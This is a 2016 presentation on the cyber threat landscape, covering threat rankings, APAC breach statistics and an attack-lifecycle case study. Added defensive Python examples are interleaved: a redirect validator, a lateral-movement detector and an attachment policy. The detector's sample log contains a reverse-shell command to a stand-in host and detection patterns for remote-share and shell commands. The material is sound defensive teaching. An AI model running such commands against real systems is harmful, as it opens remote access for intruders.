CYBER THREAT LANDSCAPE
Haris Tahir
18 November 2016
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
Agenda
ONE   Introduction: setting the right expectations
TWO   Top Cyber Threats: the current threat landscape report
THREE Key Trends: Asia Pacific region
FOUR  Mitigation: for better information security
What is the Cyber Threat Landscape?
[Figure: three linked terms: Threat Actor, Attack Vectors, Threat Agents]
The cyber threat landscape is a list of threats, with information about the threat agents and attack vectors that affect the assurance and/or objectives of information security.
How many kinds of threat landscape?
By region
By group of assets
By sector
Factors leading to change of the threat landscape
[Diagram: relationships between Owners, Security control, Risks, Assets, Attack vectors, Vulnerabilities, Threats and Threat agents. Edge labels on the slide: use, based on, to, increase, that exploit, give rise to, leading to, may be aware of these, impose, wish to abuse and/or damage, reduce, reevaluate, reduced by, wish to minimise.]
Factors leading to change of the threat landscape (continued)
[Same diagram of Owners, Security control, Risks, Assets, Attack vectors, Vulnerabilities, Threats and Threat agents, annotated with the two drivers of change on the slide: capabilities change over time, and the introduction of new people, process and technology.]
TWO. Top Cyber Threats: the current threat landscape report
Cyber threat landscape 2014 and 2015
Overview and comparison of the cyber threat landscape

Rank  Top Threats 2014              Top Threats 2015
1     Malware                       Malware
2     Web-based attacks             Web-based attacks
3     Web application attacks       Web application attacks
4     Botnets                       Botnets
5     Denial of service             Denial of service
6     Spam                          Physical damage/theft/loss
7     Phishing                      Insider threat
8     Exploit kits                  Phishing
9     Data breaches                 Spam
10    Physical damage/theft/loss    Exploit kits
11    Insider threat                Data breaches
12    Cyber espionage               Ransomware
13    Ransomware                    Cyber espionage

Legend (the trend and ranking-status icons of the slide were not recovered):
Trends: Declining, Stable, Increasing
Ranking: Going up, Same, Going down
Top Cyber Threat: malicious software
A 20-year-old malware infection technique is still in use (Microsoft Office documents via Visual Basic macros)
Conficker is still in the wild (7 years old, still accounting for 37% of infections)
Increasing use of malicious URLs compared with malicious email attachments
Mobile device innovation slows down mobile malware
The Apple store and other app stores remain a main target for “packaging” and spreading malware
[Charts: Top countries infected, values shown 60%, 60%, 58%, 58%, 58%; Top countries hosting malware, values shown 50%, 12%, 8%, 5%, 3%; country labels not recovered from the slide]
Top Cyber Threat: web-based attack
Social networking and social media have become important tactics for infection campaigns
90% of bad URLs are used for spam (they change within hours or minutes)
Malicious advertising (malvertising) campaigns use 4,000 different names and 500 domains
[Chart: Top countries hosting malicious URLs: United States, Russia, Portugal, Netherlands; values shown 40%, 6%, 3%, 2%]
Top Cyber Threat: web application attack
30-55% of web sites are vulnerable to web application attacks
Common weaknesses: lack of transport layer protection, information leakage, XSS, brute force, content sniffing, cross-site request forgery and URL redirection
[Charts: Top targeted countries: United States, Brazil, China, Others; values shown 80%, 7%, 4%, 9%. Top web attacks: LFI, SQLi, Shellshock; values shown 18%, 28%, 40%]
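The URL redirection weakness in the list above is one of the few that a single input check removes. The following is an added example, not code from the presentation: it validates a redirect target the way a login handler's `next` parameter should be validated, accepting only same-site paths or https URLs to an allow-listed host and rejecting the scheme-relative, userinfo and backslash forms that a naive "starts with /" or "contains our domain" check lets through. The allow-list, the helper names and the sample targets are constructed; only the standard library is used.

```python
"""
Added example (not from the presentation): validating a redirect target so a
"URL redirection" weakness of the kind listed on the slide cannot be used to
send a user off-site. The allow-list, the helper names and the sample targets
are constructed for this example.
"""
from urllib.parse import urlsplit

# Constructed allow-list of hosts the application may redirect to.
ALLOWED_HOSTS = {"portal.example.com", "www.example.com"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS, require_https=True):
    """True only if `target` is a same-site absolute path or an https URL to an
    allow-listed host. Anything ambiguous is rejected rather than normalised."""
    if not target:
        return False
    # Control characters, spaces and backslashes are parsed differently by
    # browsers and URL libraries; reject them instead of guessing.
    if any(ord(c) < 0x21 or c == "\\" for c in target):
        return False
    parts = urlsplit(target)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False                      # javascript:, data:, and friends
    if not parts.netloc:
        # No authority: accept only an absolute path. "//host" is scheme-relative,
        # and "https:host" has no authority but is not a path either.
        return target.startswith("/") and not target.startswith("//")
    if require_https and parts.scheme != "https":
        return False                      # http:// and scheme-relative "//host"
    # parts.hostname is lower-cased with userinfo and port stripped, so
    # "https://portal.example.com@evil.example/" resolves to evil.example.
    return parts.hostname in allowed_hosts


def safe_redirect(target, fallback="/"):
    """The Location a handler should emit: the target if safe, else the fallback."""
    return target if is_safe_redirect(target) else fallback


# Constructed sample targets as a handler might receive them in a `next` parameter.
SAMPLES = [
    "/account/settings",
    "https://portal.example.com/login?next=/home",
    "//evil.example/phish",
    "https:evil.example",
    "https://portal.example.com@evil.example/",
    "javascript:alert(1)",
    "http://portal.example.com/",
    "/\\evil.example",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:48} -> {safe_redirect(s)}")
```

The check deliberately returns a decision rather than a cleaned URL: rewriting a hostile target into a "fixed" one is where most redirect filters go wrong, so the caller either gets the original string back or the fallback.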
Top Cyber Threat: botnets
Between 20% and 40% of DDoS attacks have a botnet fingerprint
Botnets have reached market maturity in the area of cybercrime-as-a-service (CaaS)
The average lifetime of a botnet is estimated at 38 days, and the average size of a single botnet is 1,700 infected servers
Botnet operators favour rogue virtual machines for C2 server infrastructure
Countries listed on the slide: US, Ukraine, Russia, the Netherlands, Germany, Turkey, France, UK, Vietnam and Romania
Top Cyber Threat: insider threat
Reduced care, insufficient training, increased workload, inconvenient security policies, and users who do not take security seriously
Many companies do not have an insider threat prevention program
Increasing monetization opportunities created by cyber-criminals or cyber-espionage
Ineffective security measures for Bring Your Own Device (BYOD) and open Wi-Fi
THREE. Key Trends: Asia Pacific region
Key trends: Asia Pacific region
Breaches in APAC never make the news headlines
Unprepared to identify and respond to breaches
Detection period too long
Tools exclusively target organizations within APAC
Failed to eradicate
APAC incident response statistics for 2015

Characteristic                                         Quantity (average)
Number of days compromise went undiscovered            520
Number of machines analysed in an organization         21,584
Number of machines compromised by threat actor         78
Number of user accounts compromised by threat actor    10
Number of admin accounts compromised by threat actor   3
Amount of stolen data                                  3.7 GB
APAC threat actor main objectives
[Pie chart: Sensitive documents; Personally Identifiable Information (PII); Infrastructure documents; one further segment whose label was not recovered. Values shown: 40%, 20%, 20%, 20%]
Case study: how did it happen? Attack lifecycle model with classic attacker techniques
[Diagram: stages Initial Attack -> Establish Foothold -> Internal Recon -> Escalate Privileges -> Complete Missions, with a Lateral Movement / Maintain Access loop between Internal Recon and Escalate Privileges. The technique boxes on the slide, grouped by stage:]
Initial Attack: social engineering; Internet-based attack; via service provider
Establish Foothold: custom malware; command and control; web-based backdoor
Escalate Privileges: credential theft; password cracking; “pass-the-hash”; local root/admin exploitation
Lateral Movement: net use commands; smbclient commands; mount commands; reverse shell access
Maintain Access: backdoors; VPN; sleeper malware; account abuse; service provider
Complete Missions: staging servers; data consolidation; data theft
(No technique box for Internal Recon was recovered from the slide.)
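The lateral-movement box above is the stage where an attacker is most visible to a defender, because the commands listed there (net use, smbclient, mount, reverse shell access) all show up in process-creation logs. The following is an added example, not code from the presentation: a small detector that classifies such commands and raises an alert when one account reaches several remote hosts inside a short window, which is what the "data consolidation" step of the Complete Missions stage looks like from the inside. The record format, host names, account names and every log line are constructed for this example.

```python
"""
Added example (not from the presentation): detection logic for the lateral
movement techniques named on the attack lifecycle slide. The log format and
all sample records below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed record format: "<ISO timestamp> host=<source> user=<account> cmd=<command line>"
SAMPLE_LOG = r"""
2016-11-18T09:01:10 host=ws-017 user=CORP\jsmith cmd=outlook.exe
2016-11-18T09:02:44 host=ws-017 user=CORP\jsmith cmd=net use \\fs-01\c$ /user:CORP\svc_backup
2016-11-18T09:03:02 host=ws-017 user=CORP\jsmith cmd=net use \\fs-02\admin$
2016-11-18T09:03:40 host=ws-017 user=CORP\jsmith cmd=net use \\db-01\c$
2016-11-18T09:05:15 host=lnx-build user=deploy cmd=smbclient //fs-01/share -U svc_backup
2016-11-18T09:06:00 host=lnx-build user=deploy cmd=mount -t cifs //fs-03/data /mnt/d
2016-11-18T10:30:00 host=ws-042 user=CORP\agreen cmd=net use H: \\fs-01\home
2016-11-18T11:12:09 host=lnx-web user=www-data cmd=bash -c "exec 3<>/dev/tcp/203.0.113.7/4444"
"""

LINE_RE = re.compile(r"^(\S+) host=(\S+) user=(\S+) cmd=(.*)$")

# Command shapes from the slide's lateral-movement box; group 1 captures the
# remote host (or the callback address for a reverse shell).
LATERAL_PATTERNS = [
    ("net use",       re.compile(r"^net\s+use\b.*?\\\\([^\\\s]+)", re.I)),
    ("smbclient",     re.compile(r"^smbclient\b.*?//([^/\s]+)", re.I)),
    ("cifs mount",    re.compile(r"^mount\b.*?//([^/\s]+)", re.I)),
    ("reverse shell", re.compile(r"/dev/tcp/([^/\s]+)", re.I)),
]


def parse_line(line):
    """Split one record into its fields; None for a blank or unparsable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, host, user, cmd = m.groups()
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd}


def classify(cmd):
    """Return (technique, remote_target) when cmd matches a lateral-movement shape."""
    for name, rx in LATERAL_PATTERNS:
        m = rx.search(cmd)
        if m:
            return name, m.group(1)
    return None


def find_lateral_movement(log_text):
    """All records whose command line matches one of the lateral-movement patterns."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec["cmd"])
        if hit:
            rec.update(technique=hit[0], target=hit[1])
            findings.append(rec)
    return findings


def fan_out_alerts(findings, min_hosts=3, window=timedelta(minutes=10)):
    """Alert when one account touches `min_hosts` distinct remote targets within
    `window`: one mapped home drive is normal, a sweep across servers is not."""
    by_user = defaultdict(list)
    for f in findings:
        by_user[f["user"]].append(f)
    alerts = []
    for user, events in by_user.items():
        events.sort(key=lambda e: e["ts"])
        for i, start in enumerate(events):
            in_window = [e for e in events[i:] if e["ts"] - start["ts"] <= window]
            hosts = {e["target"] for e in in_window}
            if len(hosts) >= min_hosts:
                alerts.append({"user": user, "source": start["host"],
                               "first_seen": start["ts"], "hosts": sorted(hosts)})
                break  # one alert per account is enough for triage
    return alerts


if __name__ == "__main__":
    hits = find_lateral_movement(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['user']:14} {h['technique']:14} -> {h['target']}")
    for a in fan_out_alerts(hits):
        print("ALERT", a)
```

With the constructed records the single-command matches include a legitimate home-drive mapping, which is why the alert is keyed on fan-out per account rather than on any one command; the 520-day average dwell time in the APAC statistics above is what a rule tuned only to exact signatures tends to produce.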
Case study: social engineering
Steps: reconnaissance; develop attack vector; distribution medium; remote access
Case study: reconnaissance
Passive recon (search engines, associated forums, websites, social networks, etc.):
4 PDF documents, 66 employee details
haveibeenpwned.com: 109 email addresses used on different sites
208 employee details (mostly email) from an online contacts database
105 profiles
780 email addresses from an unprotected site
Roles identified: Assistant manager HR services; Assistant Vice President; Company secretary; Executive secretary; Human resources development & training consultant; Legal counsel; Project executive; Senior HR manager; Senior Vice President; Vice President; Clerk
Case study: develop attack vector (generic content)

File type           Status
EXE                 Quarantined/blocked
DLL                 Quarantined/blocked
JavaScript          Quarantined/blocked
MSI file            Quarantined/blocked
Double extension    Quarantined/blocked
CVE-15-1641 doc     Quarantined/blocked
PowerShell cmd      Quarantined/blocked
Java code           Quarantined/blocked
ASP code            Quarantined/blocked
Docx (encrypted)    Quarantined/blocked
Docx                Quarantined/blocked
Phishing link       Quarantined/blocked
Case study: develop attack vector (non-generic content)

File type           Status
EXE                 Quarantined/blocked
DLL                 Deleted
JavaScript          Quarantined/blocked
MSI file            Quarantined/blocked
Double extension    Deleted
CVE-15-1641 doc     Delivered
PowerShell cmd      Delivered
Java code           Delivered
ASP code            Deleted
Docx (encrypted)    Delivered
Docx                Delivered
Phishing link       Delivered
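The two tables show the gap a defender has to close: the same gateway that blocks every file type when the content is generic delivers macro-capable documents, encrypted documents and scripts once the content is tailored. The following is an added example, not the case study's gateway or any product's code: an attachment policy that decides deliver, quarantine or delete from the filename plus a few content-inspection flags, and that treats the cases the second table shows as delivered (double extensions, encrypted and therefore unscannable documents, macro-capable Office formats) as policy decisions rather than scanner outcomes. The policy sets, the flag names (`encrypted`, `has_macros`, `scanner_verdict`) and the sample attachments are constructed.

```python
"""
Added example (not from the presentation): an attachment policy check of the
kind a mail gateway applies to the file types in the two tables. Policy sets,
flag names and sample attachments are constructed for this example.
"""

# Constructed policy: executables and scripts never reach a mailbox.
BLOCK_EXT = {".exe", ".dll", ".msi", ".scr", ".js", ".jse", ".vbs", ".ps1",
             ".bat", ".cmd", ".jar", ".asp", ".aspx"}
# Office formats that can carry VBA macros (the Visual Basic vector on the malware slide).
MACRO_EXT = {".doc", ".xls", ".ppt", ".docm", ".xlsm", ".pptm", ".dotm", ".rtf"}
# Document types delivered when nothing else objects.
DOC_EXT = {".docx", ".xlsx", ".pptx", ".pdf", ".txt", ".png", ".jpg"}


def extensions(filename):
    """All extensions of a name, outermost first: 'invoice.pdf.exe' -> ['.exe', '.pdf']."""
    parts = filename.lower().split(".")
    return ["." + p for p in reversed(parts[1:])]


def classify_attachment(filename, *, encrypted=False, has_macros=False, scanner_verdict="clean"):
    """Return (action, reason) with action one of 'deliver', 'quarantine', 'delete'.
    `encrypted`, `has_macros` and `scanner_verdict` stand in for what a content
    inspector reports about the file; the policy below is the constructed part."""
    if "\u202e" in filename:                       # right-to-left override hides the real extension
        return "quarantine", "RLO character in filename"
    if scanner_verdict == "malicious":
        return "delete", "scanner verdict"
    exts = extensions(filename)
    blocked = [e for e in exts if e in BLOCK_EXT]
    if blocked:                                    # catches invoice.pdf.exe as well as setup.exe
        return "quarantine", f"blocked type {blocked[0]}"
    if len(exts) > 1:
        return "quarantine", "double extension"
    if not exts:
        return "quarantine", "no extension"
    outer = exts[0]
    if encrypted:                                  # cannot be scanned, so not delivered either
        return "quarantine", "encrypted, unscannable"
    if outer in MACRO_EXT:
        return ("quarantine", "macro payload") if has_macros else ("deliver", "macro-capable, no macros")
    if outer in DOC_EXT:
        return "deliver", "allowed document type"
    return "quarantine", f"unknown type {outer}"


# Constructed attachments mirroring the rows of the two tables; the dict holds
# the inspector flags for that file.
SAMPLE_ATTACHMENTS = [
    ("setup.exe", {}),
    ("helper.dll", {}),
    ("invoice.js", {}),
    ("update.msi", {}),
    ("invoice.pdf.exe", {}),
    ("agenda.doc", {"has_macros": True}),
    ("run.ps1", {}),
    ("Form.jar", {}),
    ("page.asp", {}),
    ("contract.docx", {"encrypted": True}),
    ("contract.docx", {}),
    ("summary.pdf", {}),
]


def apply_policy(items=SAMPLE_ATTACHMENTS):
    """Evaluate every (filename, inspector flags) pair; returns (name, action, reason) tuples."""
    return [(name, *classify_attachment(name, **flags)) for name, flags in items]


if __name__ == "__main__":
    for name, action, reason in apply_policy():
        print(f"{name:18} {action:11} {reason}")
```

Only the plain .docx and the PDF are delivered under this policy; everything the second table shows reaching the user is held, and an encrypted document is held precisely because nothing can be said about it.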
Case study: distribution medium
Packet injection
USB drop
Case study: remote access
FOUR. Mitigation: for better information security
Technology is not enough: listen to the experts
Bruce Schneier, security technologist, cryptographer and author:
“If you think technology can solve your security problems, then you don’t understand the problems and you don’t understand the technology.”
Eric Schmidt, Chairman and CEO, Google:
“The Internet is the first thing that humanity has built that humanity doesn’t understand, the largest experiment in anarchy that we have ever had.”
No single unique solution: protect the people
[Figure: the OSI stack, top to bottom People, Application, Presentation, Session, Transport, Network, Data Link, Physical, with People drawn as an extra layer above Application; the slide labels the stack as upper layers and lower layers]
People: most difficult to secure and the weakest link in the security chain
[Figure: Security at the centre of a People / Process / Technology triangle]
Security is a continuous process, not a static state
Securing the human: it starts with you
[Figure: security awareness programme maturity levels, from lowest to highest: Non-existent; Compliance focused; Promoting awareness & change; Long term sustainment; Metric]
“thank you” “gracias” “terima kasih” “謝謝” “dankie” “je vous remercie” “धन्यवाद” “Спасибо” “takk skal du ha” “고맙습니다” “hvala ti” “ありがとうございました”
Haris Tahir
18 November 2016